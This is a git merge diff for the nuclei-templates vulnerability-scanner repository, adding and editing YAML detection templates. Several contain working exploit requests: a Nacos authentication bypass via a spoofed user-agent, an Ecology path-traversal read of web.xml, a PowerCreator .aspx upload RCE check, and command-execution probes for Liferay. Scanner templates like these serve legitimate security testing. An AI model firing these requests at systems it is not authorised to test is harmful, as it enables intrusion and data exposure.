Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

2021-05-05 17:04:59 +03:00 · 2021-05-05 17:04:59 +03:00 · 07c2e79fb9
parent a094b38f83 0ea51e5a54
commit 07c2e79fb9
14 changed files with 178 additions and 27 deletions
--- a/README.md
+++ b/README.md
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
 | Templates        | Counts                         | Templates       | Counts                          | Templates      | Counts                       |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves             | 305           | vulnerabilities | 145 | exposed-panels | 124 |
+| cves             | 306           | vulnerabilities | 147 | exposed-panels | 124 |
-| takeovers        | 68        | exposures       | 91       | technologies   | 66   |
+| takeovers        | 68        | exposures       | 92       | technologies   | 66   |
-| misconfiguration | 57 | workflows       | 30         | miscellaneous  | 20  |
+| misconfiguration | 56 | workflows       | 30         | miscellaneous  | 20  |
 | default-logins   | 24 | exposed-tokens  | 0  | dns            | 8            |
 | fuzzing          | 8          | helpers         | 8         | iot            | 11            |
-**102 directories, 1049 files**.
+**103 directories, 1054 files**.
 </td>
 </tr>
--- a/cves/2020/CVE-2020-35951.yaml
+++ b/cves/2020/CVE-2020-35951.yaml
@ -68,7 +68,7 @@ requests:
          - "not found in <b>([/a-z_]+)wp"
    req-condition: true
-    matchers-condition: or
+    matchers-condition: and
    matchers:
      - type: word
--- a/cves/2020/CVE-2020-6287.yaml
+++ b/cves/2020/CVE-2020-6287.yaml
@ -12,16 +12,6 @@ info:
    - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
    - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
  # Affected Versions: 7.30, 7.31, 7.40, 7.50
  # p.s:
  # > Don't forget to change the default credentials
  # > to create new admin in associated file:
  # > `payloads/CVE-2020-6287.xml`
  # Ref:
  # - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
 requests:
  - payloads:
      data: helpers/payloads/CVE-2020-6287.xml
@ -42,3 +32,8 @@ requests:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "text/xml"
        part: header
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@ -15,7 +15,6 @@ requests:
      command:
        - "systeminfo"  # Windows
        - "lsb_release -a"  # Linux
        - "sysctl kern.ostype"  # macOS
    attack: sniper
    raw:
@ -40,16 +39,15 @@ requests:
        regex:
          - "OS Name:.*Microsoft Windows"
          - "Distributor ID:"
          - "kern\\.ostype"
        condition: or
        part: body
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        regex:
          - "Microsoft Windows (.*)"
          - "kern\\.ostype: (.*)"
          - "Distributor ID: (.*)"
--- a/cves/2020/CVE-2020-8191.yaml
+++ b/cves/2020/CVE-2020-8191.yaml
@ -34,3 +34,8 @@ requests:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "text/html"
        part: header
--- a/cves/2021/CVE-2021-29441.yaml
+++ b/cves/2021/CVE-2021-29441.yaml
@ -0,0 +1,49 @@
 id: CVE-2021-29441
 info:
  name: Nacos prior to 1.4.1 Authentication Bypass
  description: |
    This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.
    In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
    Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
    enables Nacos servers to bypass this filter and therefore skip authentication checks.
    This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
    This issue may allow any user to carry out any administrative tasks on the Nacos server.
  author: dwisiswant0
  severity: high
  reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
  tags: nacos,auth-bypass,cve,cve2021
 requests:
  - raw:
      - |
        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        User-Agent: Nacos-Server
    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 403"
          - "status_code_2 == 200"
        condition: and
      - type: dsl
        dsl:
          - "contains(body_1, 'Forbidden')"
          - "contains(body_2, 'true')"
        condition: and
      - type: word
        words:
          - "application/json"
        part: header
--- a/exposures/files/gogs-install-exposure.yaml
+++ b/exposures/files/gogs-install-exposure.yaml
@ -0,0 +1,25 @@
 id: gogs-install-exposure
 info:
  name: Gogs install exposure
  author: dhiyaneshDk
  severity: high
  tags: gogs,exposure
 requests:
  - method: GET
    path:
      - '{{BaseURL}}/install'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "General Settings"
          - "Database Settings"
        part: body
        condition: and
      - type: status
        status:
          - 200
--- a/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml
+++ b/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml
@ -21,5 +21,6 @@ requests:
      - type: word
        words:
          - '{{randstr}}'
-          - 'suggestions'
+          - '"results":'
          - '"suggestions":'
        condition: and
--- a/misconfiguration/nginx/nginx-status.yaml
+++ b/misconfiguration/nginx/nginx-status.yaml
@ -4,7 +4,7 @@ info:
  name: Nginx Status Page
  author: dhiyaneshDK
  severity: low
-  tags: config,nginx
+  tags: misconfig,nginx
 requests:
  - method: GET
--- a/misconfiguration/nginx/nginx-vhost-traffic-status.yaml
+++ b/misconfiguration/nginx/nginx-vhost-traffic-status.yaml
@ -0,0 +1,25 @@
 id: nginx-vhost-traffic-status
 info:
  name: Nginx Vhost Traffic Status
  author: geeknik
  reference: https://github.com/vozlt/nginx-module-vts
  severity: low
  tags: status,nginx,misconfig
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/status"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Nginx Vhost Traffic Status"
          - "Host"
          - "Zone"
        condition: and
      - type: status
        status:
          - 200
--- a/technologies/kong-detect.yaml
+++ b/technologies/kong-detect.yaml
@ -16,10 +16,10 @@ requests:
      - type: regex
        part: header
        regex:
-          - kong+
+          - "[Ss]erver: [Kk]ong+"
    extractors:
-      - type: regex
+      - type: kval
        part: header
-        regex:
+        kval:
-          - .*kong.*
+          - server
--- a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml
+++ b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml
@ -0,0 +1,20 @@
 id: ecology-filedownload-directory-traversal
 info:
  name: Ecology Directory Traversal
  author: princechaddha
  severity: medium
  tags: ecology,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<url-pattern>/weaver/"
        part: body
--- a/vulnerabilities/other/gloo-unauth.yaml
+++ b/vulnerabilities/other/gloo-unauth.yaml
@ -0,0 +1,32 @@
 id: gloo-unauth
 info:
  name: Unauthenticated Gloo UI
  author: dhiyaneshDk
  severity: high
  tags: unauth,gloo
 requests:
  - method: GET
    path:
      - '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails'
    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
      Content-type: "application/grpc-web+proto"
      Referer: "{{BaseURL}}/admin/"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "gke-remote"
        part: body
      - type: word
        words:
          - "application/grpc-web+proto"
        part: header
      - type: status
        status:
          - 200
--- a/vulnerabilities/other/powercreator-cms-rce.yaml
+++ b/vulnerabilities/other/powercreator-cms-rce.yaml
@ -21,7 +21,7 @@ requests:
        Content-Disposition: form-data; name="file1"; filename="poc.aspx"
        Content-Type: image/jpeg
-        Poc_Test
+        {{randstr}}
        -----------------------------20873900192357278038549710136--
      - |
@ -38,7 +38,8 @@ requests:
        regex:
          - "(.*?.ASPX)"
    req-condition: true
    matchers:
      - type: dsl
        dsl:
-          - "contains(body, 'Poc_Test') && status_code == 200"
+          - "contains(body_2, '{{randstr}}') && status_code_2 == 200"